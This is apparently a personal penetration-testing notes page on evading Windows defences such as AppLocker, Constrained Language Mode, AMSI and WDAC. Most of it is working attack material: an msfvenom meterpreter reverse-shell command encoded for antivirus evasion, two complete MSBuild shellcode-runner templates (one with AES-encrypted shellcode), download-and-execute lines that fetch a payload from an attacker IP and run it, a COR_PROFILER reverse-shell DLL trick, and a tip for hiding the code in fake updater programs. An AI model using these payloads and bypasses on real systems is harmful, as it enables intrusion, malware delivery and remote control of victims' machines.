xct's notes
Search…
Evasion & Bypasses

AppLocker

Writable directories in C:\Windows:
    C:\windows\tasks
Use trusted binaries : https://lolbas-project.github.io/ or find via:
1
findstr /C:"<autoElevate>true"
Copied!
Then examine the library load order with procmon and look if you can write in any path where it looks for its libraries. If a path can be written to place a simple DLL there and it will be executed elevated. A nice post about this. Common target binaries:
1
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
2
C:\Windows\SysWOW64\SystemPropertiesComputerName.exe
3
C:\Windows\SysWOW64\SystemPropertiesHardware.exe
4
C:\Windows\SysWOW64\SystemPropertiesProtection.exe
5
C:\Windows\SysWOW64\SystemPropertiesRemote.exe
Copied!

COR Profile

Create a DLL payload like this reverse shell and run:
1
set COR_ENABLE_PROFILING=1
2
COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
3
set COR_PROFILER_PATH=<path>/pwn.dll
4
tzsync
Copied!

Enumerate AppLocker Rules

This can be important because certain executeable names might be whitelisted!
1
Get-AppLockerPolicy -effective -xml
Copied!
or
1
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
Copied!

PowerShell Constrained Language Mode (CLM)

All Powershell modules in Covenant already bypass AppLocker/CLM via its own PowerShell runspace.
Also if Powershell v2 is installed we can bypass it too (because it does not support it).

AMSI

AMSI loads Defender (or other AVs) into Powershell , .Net and others. A common bypass is to patch it in memory (it's being loaded as a DLL into a user process).

Process Injection

Shelter https://www.shellterproject.com/download/ can inject shellcode into legit 32-Bit Executables and is likely to not get detected.

MSBuild Shellcode

Generate payload for msbuild in csharp output format:
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f csharp -e x86/shikata_ga_nai -i <num of iterations> > <out>.cs`
Copied!
Put the buffer into the template (be sure to change payload buffer, buffer size and some strings for av evasion:
1
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2
<Target Name="Hello">
3
<ClassExample />
4
</Target>
5
<UsingTask
6
TaskName="ClassExample"
7
TaskFactory="CodeTaskFactory"
8
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
9
<Task>
10
<Code Type="Class" Language="cs">
11
<![CDATA[
12
using System;
13
using System.Runtime.InteropServices;
14
using Microsoft.Build.Framework;
15
using Microsoft.Build.Utilities;
16
public class ClassExample : Task, ITask
17
{
18
private static UInt32 MEM_COMMIT = 0x1000;
19
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
20
[DllImport("kernel32")]
21
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
22
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
23
[DllImport("kernel32")]
24
private static extern IntPtr CreateThread(
25
UInt32 lpThreadAttributes,
26
UInt32 dwStackSize,
27
UInt32 lpStartAddress,
28
IntPtr param,
29
UInt32 dwCreationFlags,
30
ref UInt32 lpThreadId
31
);
32
[DllImport("kernel32")]
33
private static extern UInt32 WaitForSingleObject(
34
IntPtr hHandle,
35
UInt32 dwMilliseconds
36
);
37
public override bool Execute()
38
{
39
byte[] shellcode = new byte[195] {};
40
41
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
42
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
43
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
44
IntPtr hThread = IntPtr.Zero;
45
UInt32 threadId = 0;
46
IntPtr pinfo = IntPtr.Zero;
47
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
48
WaitForSingleObject(hThread, 0xFFFFFFFF);
49
return true;
50
}
51
}
52
]]>
53
</Code>
54
</Task>
55
</UsingTask>
56
</Project>
Copied!
Download & Execute:
1
Invoke-WebRequest "http://<ip>:<port>/<payload>.csproj" -OutFile "<outfile>.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\<outfile>.csproj
Copied!

MSBuild Powershell

Use https://gist.github.com/xct/72cf74cc1187e1c088758bf8b4dc4086 and encode PowerShell Command with https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=d2hvYW1p . The C# part of this code is also great for embedding into fake windows gui programs (e.g. updater).

MSBuild Encrypted Shellcode

We can combine an encrypted shellcode runner with MSBuild:
1
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2
<Target Name="Hello">
3
<ClassExample />
4
</Target>
5
<UsingTask
6
TaskName="ClassExample"
7
TaskFactory="CodeTaskFactory"
8
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
9
<Task>
10
<Code Type="Class" Language="cs">
11
<![CDATA[
12
using System;
13
using System.Runtime.InteropServices;
14
using Microsoft.Build.Framework;
15
using Microsoft.Build.Utilities;
16
using System.Diagnostics;
17
using System.IO;
18
using System.Runtime.InteropServices;
19
using System.Security.Cryptography;
20
using System.Threading;
21
22
public class ClassExample : Task, ITask
23
{
24
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
25
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
26
[DllImport("kernel32.dll")]
27
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
28
29
public override bool Execute()
30
{
31
ManualResetEvent manualResetEvent = new ManualResetEvent(false);
32
byte[] iv = new byte[16] { 0x30, ... };
33
byte[] key = new byte[32] { 0xe6, ... };
34
byte[] encrypted = new byte[512] { 0x68, 0x9d, 0xc1, ...};
35
36
Aes encryptor = Aes.Create();
37
encryptor.Mode = CipherMode.CBC;
38
encryptor.KeySize = 256;
39
encryptor.BlockSize = 128;
40
encryptor.Padding = PaddingMode.Zeros;
41
encryptor.Key = key;
42
encryptor.IV = iv;
43
44
MemoryStream memoryStream = new MemoryStream();
45
ICryptoTransform aesDecryptor = encryptor.CreateDecryptor();
46
CryptoStream cryptoStream = new CryptoStream(memoryStream, aesDecryptor, CryptoStreamMode.Write);
47
48
byte[] buf = null;
49
try
50
{
51
cryptoStream.Write(encrypted, 0, encrypted.Length);
52
cryptoStream.FlushFinalBlock();
53
buf = memoryStream.ToArray();
54
}
55
finally
56
{
57
memoryStream.Close();
58
cryptoStream.Close();
59
}
60
61
int size = buf.Length;
62
IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
63
Marshal.Copy(buf, 0, addr, size);
64
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
65
manualResetEvent.WaitOne();
66
return true;
67
}
68
69
}
70
]]>
71
</Code>
72
</Task>
73
</UsingTask>
74
</Project>
Copied!
To execute, curl a "run.txt" such that:
1
iwr http://<ip>/build.xml -OutFile c:\programdata\build.xml
2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe c:\programdata\build.xml
Copied!
See C# Section for how to encrypt for this variant.

WDAC

Check whether WDAC is enabled with Get-ComputerInfo (last 2 lines, "DeviceGuardCodeIntegrity"). The policies lives in C:\Windows\System32\CodeIntegrity or in the EFI System Partition, it has however no mounted drive by default:
1
Get-Partition
2
Get-Partition -PartitionNumber 2 | Set-Partition -NewDriverLetter X
3
Get-PSDrive
4
ls X:\EFI\Microsoft\Boot\*p7b
Copied!

Convert via WDACTools

1
ConvertTo-WDACCodeIntegrityPolicy -BinaryFilePath binpath - XmlFilePath xmlpath
Copied!
LOLBas has a lot of AWL bypasses, some of these work for code integrity too.
Powershell Scripts are often "Catalog" signed (C:\windows\system32\catroot), a signed list of hashes.
Block rules for scripts are not very robust, small changes will change the hash and let the scripts run.
When we find a binary that uses powershell (and is allowed) we might be able to abuse the powershell module load order and place a malicious powershell file that gets auto loaded.

Bypasses

      This needs a vulnerable version, Microsoft blocked a lot of versions. What we can do however is to use an old version and remove a newline in the signature if its embedded - this will stay valid signed but the hash changed, bypassing a hash based block

Resources

Device Guard

Last modified 8mo ago